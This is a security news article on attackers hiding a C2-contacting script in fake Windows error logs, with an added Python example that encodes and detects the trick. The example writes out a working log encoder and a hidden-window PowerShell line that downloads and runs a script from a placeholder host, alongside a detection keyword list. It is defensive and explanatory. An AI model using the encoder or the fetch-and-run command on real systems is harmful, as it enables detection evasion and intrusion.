Recently, security researchers discovered attackers using fake Windows error logs to hide a malicious payload. Read on to know more…
Hackers continue to devise new techniques to avoid detection. Recently, security researchers discovered a peculiar way to hide a malicious payload in plain sight, and the method is actively used in the wild. Attackers have been observed using fake error logs in which each line ends in a decimal number; read as ASCII character codes, those numbers decode to a malicious payload designed to prepare the ground for script-based attacks.
Hiding Details
To develop and execute their tradecraft, the malware authors this time used new tricks involving error logs to hide a sophisticated attack in plain sight. The attack combined renaming legitimate files, masquerading as an existing scheduled task, and storing the malicious payload in a file made to look like an error log. The fake log files contained timestamps and references to OS 6.2, the internal Windows version number shared by Windows 8 and Windows Server 2012. The final payload collects details about the compromised host: installed applications, specifically point-of-sale (PoS) software, financial applications, browsers, and tax software (Lacerte and ProSeries); security products (Kaspersky, Comodo, Defender); IP addresses; administrative privileges; and other details.
Working Mechanism
Security researchers found that the cybercriminals applied the new method only after they had compromised systems and achieved persistence. They then used a file with a .chk extension that imitated a Windows application error log. At first glance the file is not suspicious: it has timestamps and includes references to the internal Windows version number, but at the end of each line is the decimal representation of an ASCII character. Such a file does not raise suspicion from security solutions, and a user will consider it legitimate; in fact, the fake error log hides an encoded script that contacts the command-and-control server for the next step of the attack. The script is run by a scheduled task using two renamed legitimate Windows binaries, mshta.exe and powershell.exe. Renaming evades rules that key on the process name, but the renamed copies still carry Microsoft's signature, the same file hash, and the original file name in their version resource, so detection should key on those rather than on the name. Attackers use the script to collect details about installed browsers, security products, and point-of-sale software. An exclusive threat-hunting rule developed by Osman Demir helps security solutions find fake Windows error logs that contain malicious payloads.
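The mechanism above, as an added worked example (this is not code from the article, from the attackers, or from the hunting rule it mentions): `make_fake_log` builds a file in which every line looks like an application error log entry but ends in the decimal ASCII code of one character of a script, and `analyze_log` is a hunting heuristic that reverses the trick. The line layout, the "error status" wording, the indicator word list and the stand-in stage-two script are all assumptions modelled on the description; the host name is a placeholder that resolves nowhere.

```python
"""Added example: hide a script in a fake Windows "error log" as per-line trailing
decimal ASCII codes, and detect such a file. Constructed for this article; the line
layout, indicator list and demo script are assumptions, not samples from the incident."""
import re
from datetime import datetime, timedelta
from typing import Optional

# A line that ends in a 1-3 digit number not glued to other digits
# (so "pid 4120" or "0x80004005" are not mistaken for a hidden code).
TRAILING_CODE_RE = re.compile(r'(?<!\d)(\d{1,3})\s*$')

# Substrings whose presence in the decoded text suggests a script (assumed list).
SCRIPT_INDICATORS = ('powershell', 'mshta', 'iex', 'invoke-', 'downloadstring',
                     'wscript', 'createobject', 'cmd /c', 'http')

# Constructed stand-in for the stage-two fetcher the article describes;
# c2.example.invalid is a placeholder and resolves nowhere.
DEMO_SCRIPT = ('powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
               ".DownloadString('http://c2.example.invalid/stage2')\"")


def make_fake_log(script: str, start: datetime = datetime(2020, 3, 2, 9, 15)) -> str:
    """Attacker side: one plausible-looking log line per character of `script`,
    with the character's decimal ASCII code as the last token on the line.
    Timestamps advance, and "OS 6.2" mimics the Windows 8 / Server 2012
    version references seen in the real files."""
    lines = []
    for i, ch in enumerate(script):
        ts = (start + timedelta(seconds=7 * i)).strftime('%Y-%m-%d %H:%M:%S')
        lines.append(f'{ts} Application error, OS 6.2, error status {ord(ch)}')
    return '\n'.join(lines) + '\n'


def extract_trailing_code(line: str) -> Optional[int]:
    """Return the trailing decimal number of a line, or None if there is none."""
    m = TRAILING_CODE_RE.search(line)
    return int(m.group(1)) if m else None


def decode_trailing_codes(text: str) -> str:
    """Defender side: concatenate the trailing codes that fall in the printable
    ASCII range (32-126); other numbers are treated as ordinary log content."""
    chars = []
    for line in text.splitlines():
        code = extract_trailing_code(line)
        if code is not None and 32 <= code <= 126:
            chars.append(chr(code))
    return ''.join(chars)


def analyze_log(text: str, min_ratio: float = 0.9) -> dict:
    """Hunting heuristic: flag a file when nearly every line ends in a printable
    ASCII code AND the decoded text contains script-like tokens. Either signal
    alone is weak: real logs end in counters and status codes all the time."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    decoded = decode_trailing_codes(text)
    ratio = len(decoded) / len(lines) if lines else 0.0
    hits = [tok for tok in SCRIPT_INDICATORS if tok in decoded.lower()]
    return {'ratio': round(ratio, 3), 'decoded': decoded, 'indicators': hits,
            'suspicious': ratio >= min_ratio and bool(hits)}


# Constructed benign log: numbers at line ends, but nothing decodes to a script.
BENIGN_LOG = """2020-03-02 09:15:00 Service started, OS 6.2, pid 4120
2020-03-02 09:15:07 Loaded 3 plugins
2020-03-02 09:15:14 Connection refused, error 0x80004005
2020-03-02 09:15:21 Retrying in 30s
"""

if __name__ == '__main__':
    fake = make_fake_log(DEMO_SCRIPT)
    print(fake.splitlines()[0])      # looks like any other log line
    print(analyze_log(fake))         # suspicious: True, decoded == DEMO_SCRIPT
    print(analyze_log(BENIGN_LOG))   # suspicious: False
```

The two-signal rule matters in practice: a counter or HTTP status at the end of every line would satisfy the ratio test on its own, and a stray "http" in decoded garbage would satisfy the keyword test on its own, so only the combination is worth alerting on. A real hunt would also scope the check to files with odd extensions such as .chk in locations where no application writes logs.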
Evasion Techniques in the Past
In past attacks too, hackers have been observed using steganography and other sly techniques to hide malicious code inside legitimate-looking files. In June 2020, Tycoon ransomware was observed hiding its payload in a Java image file (JIMAGE format) to avoid detection on Windows and Linux systems and target corporate networks. In May 2020, attackers targeted victims in Japan, the U.K., Germany, and Italy, delivering malicious PowerShell scripts hidden in image files to steal employee credentials from organizations tied to the industrial sector. In the same month, the Tropic Trooper group used steganography to mask its backdoor routines and evade anti-malware and network perimeter detection.
Mitigation
Organizations should use threat intelligence to stay current on steganographic and similar evasion techniques, expedite and prioritize vulnerability patches, updates, and policy controls, and protect networks against application exploits, malicious software, botnets, and zero-day vulnerabilities. Because this particular technique relies on a scheduled task and on renamed but otherwise legitimate Windows binaries rather than on an unpatched flaw, hunting for unexpected scheduled tasks, for signed Microsoft binaries running under unfamiliar names, and for log-like files that decode to scripts is more directly useful than patching alone.